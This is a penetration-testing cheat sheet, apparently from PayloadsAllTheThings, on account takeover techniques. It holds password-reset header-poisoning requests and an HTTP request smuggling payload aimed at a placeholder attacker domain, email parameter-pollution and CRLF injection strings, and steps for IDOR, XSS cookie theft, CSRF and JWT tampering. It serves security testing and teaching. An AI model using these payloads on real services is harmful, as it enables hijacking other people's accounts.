index.md (7611B)
1 --- 2 title: "Account Takeover" 3 topic: "Account Takeover" 4 topicSlug: "account-takeover" 5 sourcePath: "Account Takeover/README.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Account%20Takeover/README.md" 7 sha: "3ac27901c711" 8 isReadme: true 9 --- 10 11 # Account Takeover 12 13 > Account Takeover (ATO) is a significant threat in the cybersecurity landscape, involving unauthorized access to users' accounts through various attack vectors. 14 15 ## Summary 16 17 * [Password Reset Feature](#password-reset-feature) 18 * [Password Reset Token Leak via Referrer](#password-reset-token-leak-via-referrer) 19 * [Account Takeover Through Password Reset Poisoning](#account-takeover-through-password-reset-poisoning) 20 * [Password Reset via Email Parameter](#password-reset-via-email-parameter) 21 * [IDOR on API Parameters](#idor-on-api-parameters) 22 * [Weak Password Reset Token](#weak-password-reset-token) 23 * [Leaking Password Reset Token](#leaking-password-reset-token) 24 * [Password Reset via Username Collision](#password-reset-via-username-collision) 25 * [Account Takeover Due To Unicode Normalization Issue](#account-takeover-due-to-unicode-normalization-issue) 26 * [Account Takeover via Web Vulnerabilities](#account-takeover-via-web-vulnerabilities) 27 * [Account Takeover via Cross Site Scripting](#account-takeover-via-cross-site-scripting) 28 * [Account Takeover via HTTP Request Smuggling](#account-takeover-via-http-request-smuggling) 29 * [Account Takeover via CSRF](#account-takeover-via-csrf) 30 * [References](#references) 31 32 ## Password Reset Feature 33 34 ### Password Reset Token Leak via Referrer 35 36 1. Request password reset to your email address 37 2. Click on the password reset link 38 3. Don't change password 39 4. Click any 3rd party websites(e.g., Facebook, twitter) 40 5. Intercept the request in Burp Suite proxy 41 6. Check if the referer header is leaking password reset token. 42 43 ### Account Takeover Through Password Reset Poisoning 44 45 1. Intercept the password reset request in Burp Suite 46 2. Add or edit the following headers in Burp Suite : `Host: [ATTACKER.DOMAIN.TLD]`, `X-Forwarded-Host: [ATTACKER.DOMAIN.TLD]` 47 3. Forward the request with the modified header 48 49 ```http 50 POST https://example.com/reset.php HTTP/1.1 51 Accept: */* 52 Content-Type: application/json 53 Host: [ATTACKER.DOMAIN.TLD] 54 ``` 55 56 4. Look for a password reset URL based on the *host header* like : `https://[ATTACKER.DOMAIN.TLD]/reset-password.php?token=TOKEN` 57 58 ### Password Reset via Email Parameter 59 60 ```powershell 61 # parameter pollution 62 email=victim@mail.com&email=hacker@mail.com 63 64 # array of emails 65 {"email":["victim@mail.com","hacker@mail.com"]} 66 67 # carbon copy 68 email=victim@mail.com%0A%0Dcc:hacker@mail.com 69 email=victim@mail.com%0A%0Dbcc:hacker@mail.com 70 71 # separator 72 email=victim@mail.com,hacker@mail.com 73 email=victim@mail.com%20hacker@mail.com 74 email=victim@mail.com|hacker@mail.com 75 ``` 76 77 ### IDOR on API Parameters 78 79 1. Attacker have to login with their account and go to the **Change password** feature. 80 2. Start the Burp Suite and Intercept the request 81 3. Send it to the repeater tab and edit the parameters : User ID/email 82 83 ```powershell 84 POST /api/changepass 85 [...] 86 ("form": {"email":"victim@email.com","password":"securepwd"}) 87 ``` 88 89 ### Weak Password Reset Token 90 91 The password reset token should be randomly generated and unique every time. 92 Try to determine if the token expire or if it's always the same, in some cases the generation algorithm is weak and can be guessed. The following variables might be used by the algorithm. 93 94 * Timestamp 95 * UserID 96 * Email of User 97 * Firstname and Lastname 98 * Date of Birth 99 * Cryptography 100 * Number only 101 * Small token sequence (<6 characters between [A-Z,a-z,0-9]) 102 * Token reuse 103 * Token expiration date 104 105 ### Leaking Password Reset Token 106 107 1. Trigger a password reset request using the API/UI for a specific email e.g: <test@mail.com> 108 2. Inspect the server response and check for `resetToken` 109 3. Then use the token in an URL like `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]` 110 111 ### Password Reset via Username Collision 112 113 1. Register on the system with a username identical to the victim's username, but with white spaces inserted before and/or after the username. e.g: `"admin "` 114 2. Request a password reset with your malicious username. 115 3. Use the token sent to your email and reset the victim password. 116 4. Connect to the victim account with the new password. 117 118 The platform CTFd was vulnerable to this attack. 119 See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245) 120 121 ### Account Takeover Due To Unicode Normalization Issue 122 123 When processing user input involving unicode for case mapping or normalisation, unexpected behavior can occur. 124 125 * Victim account: `demo@gmail.com` 126 * Attacker account: `demⓞ@gmail.com` 127 128 [Unisub - is a tool that can suggest potential unicode characters that may be converted to a given character](https://github.com/tomnomnom/hacks/tree/master/unisub). 129 130 [Unicode pentester cheatsheet](https://gosecure.github.io/unicode-pentester-cheatsheet/) can be used to find list of suitable unicode characters based on platform. 131 132 ## Account Takeover via Web Vulnerabilities 133 134 ### Account Takeover via Cross Site Scripting 135 136 1. Find an XSS inside the application or a subdomain if the cookies are scoped to the parent domain : `*.domain.com` 137 2. Leak the current **sessions cookie** 138 3. Authenticate as the user using the cookie 139 140 ### Account Takeover via HTTP Request Smuggling 141 142 Refer to **HTTP Request Smuggling** vulnerability page. 143 144 1. Use **smuggler** to detect the type of HTTP Request Smuggling (CL, TE, CL.TE) 145 146 ```powershell 147 git clone https://github.com/defparam/smuggler.git 148 cd smuggler 149 python3 smuggler.py -h 150 ``` 151 152 2. Craft a request which will overwrite the `POST / HTTP/1.1` with the following data: 153 154 ```powershell 155 GET http://[ATTACKER.DOMAIN.TLD] HTTP/1.1 156 X: 157 ``` 158 159 3. Final request could look like the following 160 161 ```powershell 162 GET / HTTP/1.1 163 Transfer-Encoding: chunked 164 Host: something.com 165 User-Agent: Smuggler/v1.0 166 Content-Length: 83 167 168 0 169 170 GET http://[ATTACKER.DOMAIN.TLD] HTTP/1.1 171 X: X 172 ``` 173 174 Hackerone reports exploiting this bug 175 176 * <https://hackerone.com/reports/737140> 177 * <https://hackerone.com/reports/771666> 178 179 ### Account Takeover via CSRF 180 181 1. Create a payload for the CSRF, e.g: "HTML form with auto submit for a password change" 182 2. Send the payload 183 184 ### Account Takeover via JWT 185 186 JSON Web Token might be used to authenticate a user. 187 188 * Edit the JWT with another User ID / Email 189 * Check for weak JWT signature 190 191 ## References 192 193 * [$6,5k + $5k HTTP Request Smuggling mass account takeover - Slack + Zomato - Bug Bounty Reports Explained - August 30, 2020](https://web.archive.org/web/20250701123134/https://www.youtube.com/watch?v=gzM4wWA7RFo) 194 * [10 Password Reset Flaws - Anugrah SR - September 16, 2020](https://web.archive.org/web/20250626114943/https://anugrahsr.github.io/posts/10-Password-reset-flaws/) 195 * [Broken Cryptography & Account Takeovers - Harsh Bothra - September 20, 2020](https://web.archive.org/web/20250913121907/https://speakerdeck.com/harshbothra/broken-cryptography-and-account-takeovers?slide=28) 196 * [CTFd Account Takeover - NIST National Vulnerability Database - March 29, 2020](https://web.archive.org/web/20200329075120/https://nvd.nist.gov/vuln/detail/CVE-2020-7245) 197 * [Hacking Grindr Accounts with Copy and Paste - Troy Hunt - October 3, 2020](https://web.archive.org/web/20251219192449/https://www.troyhunt.com/hacking-grindr-accounts-with-copy-and-paste/)